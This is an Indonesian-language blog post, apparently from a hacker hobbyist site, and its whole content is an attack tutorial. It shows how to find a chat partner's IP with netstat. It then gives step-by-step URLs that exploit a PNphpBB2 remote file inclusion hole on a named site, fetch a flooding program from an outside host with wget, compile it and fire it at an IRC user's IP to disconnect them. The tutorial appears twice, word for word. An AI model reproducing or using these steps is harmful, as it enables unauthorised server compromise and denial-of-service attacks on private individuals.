Newbie tip: Dengna cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************
DDOS (Cara menembak ip orang dari shell orang lain)
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.defendersofmodan.net/index.php?name=PNphpBB2
2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net
3. Masukkan bug ini di belakang situs tadi :
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
4. Masukkan file inject ini di belakang nya lagi :
http://www.geocities.com/jambihackerlinkcrew/sql.htm
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd
Jangan lupa memasukkan command Unix di ujungnya
5. Masukkan file tembak.c ini di belakang nya lagi :
http://channels.dal.net/kota-makassar/tembak.c
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://channels.dal.net/kota-makassar/tembak.c -O /var/tmp/tembak.c
6. Kemudian Compile file tembak.c
http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c
7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois
misal nya
ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute
Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers
8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).
misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port
http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53
Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.defendersofmodan.net/index.php?name=PNphpBB2
2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net
3. Masukkan bug ini di belakang situs tadi :
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
4. Masukkan file inject ini di belakang nya lagi :
http://www.geocities.com/jambihackerlinkcrew/sql.htm
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd
Jangan lupa memasukkan command Unix di ujungnya
5. Masukkan file tembak.c ini di belakang nya lagi :
http://channels.dal.net/kota-makassar/tembak.c
Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://channels.dal.net/kota-makassar/tembak.c -O /var/tmp/tembak.c
6. Kemudian Compile file tembak.c
http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c
7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois
misal nya
ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute
Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers
8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).
misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port
http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53
Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.
Subscribe to:
Posts (Atom)